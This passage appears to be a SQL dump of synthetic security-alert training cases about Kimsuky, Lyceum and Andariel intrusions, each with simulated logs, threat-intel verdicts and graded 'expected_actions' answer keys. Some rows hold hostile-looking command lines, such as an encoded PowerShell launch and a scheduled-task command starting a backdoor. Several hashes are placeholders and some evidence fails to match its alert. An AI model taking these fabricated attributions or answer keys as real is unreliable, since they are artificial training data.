4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for exfiltration detected.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1345, 'Exfiltration of Sensitive Information', 'critical', 'Outbound Network Traffic Logs', 'The final step involves exfiltrating the harvested data to an external command and control server operated by Lyceum.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:01Z\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"filename\":\"confidential_data.zip\",\"hash\":\"d4c3b4f9a1b0e5d2c1f2e3a4b5c6d7e8\",\"user\":\"jdoe\",\"action\":\"ALLOW\",\"event_id\":\"EVT0001234567\",\"indicator\":\"Lyceum C2 Server\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known Lyceum C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d4c3b4f9a1b0e5d2c1f2e3a4b5c6d7e8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Associated with data exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP System\",\"verdict\":\"suspicious\",\"details\":\"File name matched with sensitive data pattern\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Active directory user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1346, 'Suspicious Email Detected', 'medium', 'Email Security Gateway', 'A seemingly benign email with a malicious attachment is flagged, marking the start of Kimsuky\'s attempt to infiltrate South Korean networks. The email contained a malicious Excel file attachment that was blocked by the email security system.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"source_email\":\"sender@maliciousdomain.com\",\"destination_email\":\"victim@organization.kr\",\"subject\":\"Urgent: Please Review Attached Document\",\"attachment\":{\"filename\":\"Q3_Report.xlsm\",\"hash\":\"9e107d9d372bb6826bd81d3542a419d6\"},\"malware_detection\":{\"signature\":\"Kimsuky_Malware\",\"result\":\"Detected\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal user system.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"sender@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address linked to multiple phishing attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Q3_Report.xlsm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File contains macro-based malware.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Kimsuky malware variant.\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected\",\"date\":\"2026-03-02T13:55:06.846Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1347, 'AppleSeed Backdoor Installation', 'high', 'Endpoint Detection and Response (EDR) System', 'The malware embedded in the attachment executes, leveraging the AppleSeed backdoor to establish a foothold within the network. An executable was detected running on the host system, which corresponds to known AppleSeed backdoor activity.', 'Malware Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:22:11Z\",\"event_id\":\"EDR-5054\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"workstation-22\",\"user\":\"jdoe\",\"process_name\":\"apple_seed_installer.exe\",\"process_id\":\"4892\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\apple_seed_installer.exe\",\"signature\":\"AppleSeed Backdoor\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous AppleSeed campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with AppleSeed malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"apple_seed_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename matches known AppleSeed backdoor installer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1348, 'Persistence Mechanism Activated', 'medium', 'System Logs', 'The system has detected a scheduled task created by Kimsuky to maintain the persistence of the AppleSeed malware, ensuring continued access to the compromised system.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:23Z\",\"event_id\":\"4624\",\"user\":\"compromised_user\",\"source_ip\":\"192.168.1.105\",\"attacker_ip\":\"203.0.113.45\",\"scheduled_task_name\":\"AppleSeed_Update\",\"task_command\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\AppleSeed.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"status\":\"Task Created\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"This IP is associated with known campaigns by Kimsuky.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known variant of AppleSeed malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"AppleSeed.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable associated with AppleSeed malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User account likely compromised to set up persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scheduled_task_name\\\":\\\"AppleSeed_Update\\\",\\\"task_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\AppleSeed.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"status\\\":\\\"Task Created\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1349, 'Credential Harvesting Detected', 'high', 'Network Traffic Analysis', 'The attackers use harvested credentials to move laterally across the network, seeking sensitive information within government databases. Malicious activity involving external IP 203.0.113.45 attempting to authenticate using compromised credentials was detected.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"event_type\":\"authentication_attempt\",\"username\":\"jdoe\",\"status\":\"failed\",\"protocol\":\"RDP\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"rdp_login_attempt.log\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user within organization.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known associations with malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1350, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) System', 'Detected attempts to send large volumes of sensitive data outside the network, concluding the attack sequence as Kimsuky seeks to exfiltrate valuable intelligence.', 'Data Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"confidential_report.pdf\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"detection_method\":\"DLP\",\"severity\":\"high\"}', '2026-03-01 23:01:17', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a corporate workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous data exfiltration attacks by Kimsuky.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document flagged by DLP system during transmission.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"Known file hash, previously scanned and verified as safe.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account, potential insider threat.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1351, 'Phishing Email Detected', 'high', 'Corporate Email Security System', 'An employee at a South Korean defense contractor receives a suspicious email purporting to be from a known supplier. The email contains a malicious attachment designed to install malware upon opening.', 'Initial Access', 'T1566.001 - Phishing: Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T08:45:22Z\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.3.45\",\"email_subject\":\"Urgent: New Contract Draft\",\"sender_email\":\"supplier@example.com\",\"recipient_email\":\"employee@skdefense.kr\",\"attachment_name\":\"Contract_Draft.exe\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"action_taken\":\"Email quarantined\",\"alert_id\":\"ALERT-20231005-0001\"}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"supplier@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Email Reputation System\",\"verdict\":\"suspicious\",\"details\":\"Email domain recently registered and used in phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Contract_Draft.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Executable file containing known malware signature\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.853Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1352, 'Malware Execution Triggered', 'high', 'Endpoint Detection and Response (EDR) System', 'A custom Andariel malware variant has been executed on the host system, providing remote access capabilities to the attacker.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-31T14:32:58Z\",\"event_id\":\"4625\",\"host_ip\":\"192.168.1.45\",\"username\":\"jdoe\",\"process\":{\"name\":\"msword.exe\",\"path\":\"C:\\\\Program Files\\\\Microsoft Office\\\\Office16\\\\msword.exe\"},\"file\":{\"name\":\"invoice.docx\",\"path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\invoice.docx\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"},\"network\":{\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443},\"malware\":{\"name\":\"Andariel\",\"variant\":\"Custom\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence 